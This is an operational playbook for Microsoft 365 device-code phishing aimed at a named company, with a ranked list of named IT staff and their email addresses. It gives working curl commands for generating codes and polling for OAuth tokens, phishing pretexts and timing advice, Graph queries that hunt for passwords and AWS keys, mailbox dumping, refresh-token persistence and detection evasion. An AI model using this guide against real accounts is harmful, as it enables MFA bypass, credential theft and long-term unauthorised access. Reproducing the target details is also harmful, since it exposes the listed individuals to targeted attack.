# M365 Device Code Phishing - Complete Attack Guide
# Operation AD - wearesocial.com
# Date: 2026-01-23

================================================================================
                              OVERVIEW
================================================================================

Attack: Microsoft OAuth 2.0 Device Authorization Grant Flow Abuse
Target: wearesocial.com IT Personnel
Success Rate: 70%

How it works:
- Attacker generates device code from Microsoft
- Victim enters code on REAL Microsoft site (microsoft.com/devicelogin)
- Victim authenticates through Okta federation + MFA
- Attacker receives OAuth tokens (bypasses MFA completely)

Why it works on wearesocial.com:
- M365 federated to Okta (confirmed)
- Okta pssoEnabled: false (no phishing-resistant MFA)
- Okta itpEnabled: false (no threat protection)
- Tenant ID: c444fffe-2181-46e8-ad79-6da1c731c973

================================================================================
                         STEP 0: SETUP TOOLS
================================================================================

## Option 1: Custom Python Script (Recommended)
chmod +x recon/week3/day3/token_poller.py

## Option 2: TokenTactics (PowerShell)
git clone https://github.com/rvrsh3ll/TokenTactics.git
pwsh -c "Import-Module ./TokenTactics/TokenTactics.psd1"

## Option 3: roadtx (Python)
pip install roadtx

## Option 4: AADInternals (PowerShell)
Install-Module AADInternals -Force
Import-Module AADInternals

================================================================================
                     STEP 1: GENERATE DEVICE CODE
================================================================================

## Using Python script:
python3 recon/week3/day3/token_poller.py david.whybrow@wearesocial.com

## Using curl (manual):
curl -s -X POST "https://login.microsoftonline.com/common/oauth2/v2.0/devicecode" \
  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  -d "scope=https://graph.microsoft.com/.default offline_access"

## Using TokenTactics:
Get-AzureToken -Client MSGraph

## Response:
{
  "user_code": "CYSZD29VC",         ← PUT THIS IN PHISHING EMAIL
  "device_code": "DAQABAAEAAAm...",  ← KEEP SECRET (for polling)
  "verification_uri": "https://microsoft.com/devicelogin",
  "expires_in": 900                  ← 15 MINUTES TO ACT
}

## Alternative Client IDs:
- d3590ed6-52b3-4102-aeff-aad2292ab01c (Microsoft Office) ← DEFAULT
- 1b730954-1685-4b74-9bfd-dac224a7b894 (Azure PowerShell)
- 04b07795-8ddb-461a-bbee-02f9e1bf7b46 (Azure CLI)
- 00000002-0000-0ff1-ce00-000000000000 (Office 365 Exchange)

================================================================================
                 STEP 2: SEND PHISHING EMAIL (WITHIN 15 MIN)
================================================================================

## Email Configuration:
From: Spoofed or lookalike domain (DMARC blocks @wearesocial.com)
To: david.whybrow@wearesocial.com
Subject: Action Required: Verify Your Microsoft 365 Account

## Template File:
recon/week3/day3/phishing-template-it-verification.html

## Replace in template:
{{DEVICE_CODE}} → CYSZD29VC (your generated code)

## Alternative Pretexts:
1. IT Security Verification (recommended)
   Subject: Action Required: Verify Your Microsoft 365 Account

2. SharePoint Access Issue
   Subject: SharePoint Access - Action Required

3. Teams MFA Enrollment
   Subject: Microsoft Teams - Complete MFA Setup

4. Salary/HR Document (high click rate)
   Subject: Q1 2026 Salary Review - Confidential

## Timing Recommendations:
- Send during business hours: 9AM-12PM GMT
- Best days: Tuesday, Wednesday, Thursday
- Hybrid work policy: 3 days/week office
- Code expires: 15 minutes after generation

================================================================================
                    STEP 3: START POLLING (BEFORE EMAIL)
================================================================================

## Using Python script (automatic):
# Already polling after Step 1
# Shows: "[*] Waiting for user authentication... (850s remaining)"

## Using curl (manual polling loop):
DEVICE_CODE="DAQABAAEAAAm..."  # From Step 1

while true; do
  RESPONSE=$(curl -s -X POST "https://login.microsoftonline.com/common/oauth2/v2.0/token" \
    -d "grant_type=urn:ietf:params:oauth:grant-type:device_code" \
    -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
    -d "device_code=$DEVICE_CODE")
  
  echo "$RESPONSE" | jq .
  
  if echo "$RESPONSE" | grep -q "access_token"; then
    echo "[+] TOKEN CAPTURED!"
    break
  fi
  
  sleep 5
done

## Response while waiting:
{"error": "authorization_pending"}

## Response on user decline:
{"error": "authorization_declined"}

## Response on timeout:
{"error": "expired_token"}

================================================================================
                   STEP 4: VICTIM ACTIONS (WHAT THEY SEE)
================================================================================

VICTIM FLOW:

1. Receives phishing email
   ↓
2. Clicks https://microsoft.com/devicelogin (REAL Microsoft site)
   ↓
3. Enters code: CYSZD29VC
   ↓
4. Microsoft shows: "You are signing in to Microsoft Office"
   ↓
5. Microsoft redirects to wearesocial.okta.com (federation)
   ↓
6. Victim enters Okta username/password
   ↓
7. Okta sends MFA push to victim's phone
   ↓
8. Victim approves MFA (thinks it's legitimate request)
   ↓
9. Screen shows: "You have signed in to the Microsoft Office application"
   ↓
10. Victim closes window (attack complete)

================================================================================
                   STEP 5: TOKEN CAPTURE (AUTOMATIC)
================================================================================

## Polling now returns:
{
  "access_token": "eyJ0eXAiOiJKV1QiLCJhbGc...",   ← IMMEDIATE ACCESS
  "refresh_token": "0.AVYAQIxhZmC...",             ← PERSISTENCE (1 YEAR)
  "token_type": "Bearer",
  "expires_in": 3600,
  "scope": "https://graph.microsoft.com/.default"
}

## Token saved to:
tokens_david.whybrow_at_wearesocial.com_20260123_181530.json

## What you now have:
- access_token: Valid for 1 hour, immediate M365 access
- refresh_token: Valid for ~1 year, can generate new access tokens

================================================================================
                       STEP 6: POST-EXPLOITATION
================================================================================

## Export tokens:
export ACCESS_TOKEN='eyJ0eXAiOiJKV1QiLCJhbGc...'
export REFRESH_TOKEN='0.AVYAQIxhZmC...'

## Get user info:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/me" | jq .

## PRIORITY 1: AZURE AD ENUMERATION (MOST VALUABLE)

## List all users:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/users" | jq .

## List all groups:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/groups" | jq .

## Find Global Admins:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/directoryRoles" | jq .

## Get specific role members (Global Admin role ID):
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/directoryRoles/filterByRoleId(roleId='62e90394-69f5-4237-9190-012177145e10')/members" | jq .

## PRIORITY 2: SHAREPOINT (may have internal docs with creds)

## List all SharePoint sites:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/sites?search=*" | jq .

## Search SharePoint for passwords/credentials:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/search/query" \
  -H "Content-Type: application/json" \
  -d '{"requests":[{"entityTypes":["driveItem","listItem"],"query":{"queryString":"password OR credential OR AWS OR api_key"}}]}' | jq .

## PRIORITY 3: ONEDRIVE (IT staff may store scripts here)

## List OneDrive files:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/me/drive/root/children" | jq .

## Search OneDrive for sensitive files:
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/me/drive/root/search(q='password')" | jq .

## LOW PRIORITY: Teams (they use Slack instead)

## List Teams (probably empty):
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/me/joinedTeams" | jq .

## SKIP: Outlook/Email - they use Google Workspace!

## Using TokenTactics for deeper access:
Invoke-RefreshToMSGraphToken -RefreshToken $REFRESH_TOKEN
Invoke-RefreshToMSTeamsToken -RefreshToken $REFRESH_TOKEN
Invoke-RefreshToOutlookToken -RefreshToken $REFRESH_TOKEN
Invoke-RefreshToAzureManagementToken -RefreshToken $REFRESH_TOKEN

## Dump mailbox:
Invoke-DumpOWAMailboxViaMSGraphApi -AccessToken $ACCESS_TOKEN

## Using AADInternals:
$tokens = Read-AADIntAccessToken -AccessToken $ACCESS_TOKEN
Get-AADIntUsers -AccessToken $ACCESS_TOKEN
Get-AADIntGlobalAdmins -AccessToken $ACCESS_TOKEN

================================================================================
                         PERSISTENCE
================================================================================

## Refresh token is valid for ~1 year
## Generate new access token anytime:

curl -s -X POST "https://login.microsoftonline.com/common/oauth2/v2.0/token" \
  -d "grant_type=refresh_token" \
  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  -d "refresh_token=$REFRESH_TOKEN" \
  -d "scope=https://graph.microsoft.com/.default" | jq .

## Store refresh token securely - this is your persistent access!

================================================================================
                       DETECTION EVASION
================================================================================

1. Login appears from attacker's IP, not victim's
   - Use residential proxy for device code request
   - VPN to match victim's geo-location

2. Access tokens from refresh don't appear in sign-in logs
   - Initial auth logged, subsequent refreshes are not

3. Rotate tokens regularly
   - Don't use same access token for extended periods

4. Avoid suspicious queries
   - Don't enumerate all users immediately
   - Gradual reconnaissance

================================================================================
                         TIMELINE SUMMARY
================================================================================

| Time     | Action                                           |
|----------|--------------------------------------------------|
| T+0      | Run token_poller.py - generates code, starts poll|
| T+1min   | Send phishing email with device code             |
| T+2-14m  | Wait for victim to authenticate                  |
| T+?      | Token captured automatically                     |
| T+immed  | Begin post-exploitation                          |

================================================================================
                        TARGET LIST
================================================================================

Priority order (IT personnel with highest access):

1. david.whybrow@wearesocial.com
   Title: IT Director
   Value: HIGHEST - likely Okta Super Admin, Azure AD admin
   
2. simone.scremin@wearesocial.com
   Title: Technology Director
   Value: HIGH - strategic access, AWS/infra likely
   
3. tobias.hall@wearesocial.com
   Title: Global Systems Manager
   Value: HIGH - system-wide access
   
4. neil.lee@wearesocial.com
   Title: Senior Systems Manager
   Value: MEDIUM-HIGH - operational access
   
5. jimmy.reilly@wearesocial.com
   Title: Senior IT Support Engineer
   Value: MEDIUM - can reset passwords, helpdesk access

================================================================================
                        FILES REFERENCE
================================================================================

| File                                    | Purpose                     |
|-----------------------------------------|-----------------------------|
| recon/week3/day3/token_poller.py        | Automated code gen + poll   |
| recon/week3/day3/phishing-template-*.html| HTML email template        |
| recon/week3/day3/m365-phishing-setup.txt| Full setup documentation    |
| recon/week1/day1/okta-phishing-steps.txt| Original attack flow docs   |
| recon/week1/day1/auth-sso.txt           | Okta configuration details  |

================================================================================
                       MITRE ATT&CK MAPPING
================================================================================

T1566.002 - Phishing: Spearphishing Link
T1078.004 - Valid Accounts: Cloud Accounts  
T1528     - Steal Application Access Token
T1556.006 - Modify Authentication Process: Multi-Factor Authentication

================================================================================
                       SUCCESS METRICS
================================================================================

Estimated click rate: 5-15%
Estimated auth rate: 70% (of those who click)
Expected outcome: 1-3 compromised accounts from 5 targets

================================================================================
                         WHAT YOU GET
================================================================================

WARNING: wearesocial.com does NOT primarily use M365!
Their actual SaaS stack:
- Email: Google Workspace (Gmail)
- Files: Google Drive + Dropbox
- Chat: Slack
- Collab: Workplace by Meta ("The Ship")
- Project: JIRA + Monday.com

M365 is federated to Okta but may have LIMITED actual usage.

## LIKELY AVAILABLE (with M365 token):

✅ Azure AD - User enumeration, groups, admins (MOST VALUABLE)
✅ SharePoint - May have internal docs/wikis with credentials
⚠️  OneDrive - Probably sparse (they use Google Drive/Dropbox)
⚠️  Teams - Probably sparse (they use Slack/Workplace)

## NOT AVAILABLE:

❌ Email - Google Workspace, NOT Outlook
❌ Main file storage - Google Drive + Dropbox
❌ Main chat - Slack
❌ Full Okta SSO apps - Salesforce, Slack, etc. (need Evilginx)
❌ On-prem AD - need VPN/internal access

## REAL VALUE OF M365 TOKEN:

1. Azure AD enumeration - full user list, groups, Global Admins
2. SharePoint search - internal wikis may have credentials/AWS keys
3. Pivot to Azure - if IT Director has Azure admin role
4. OneDrive of IT staff - may store scripts/configs/passwords

================================================================================
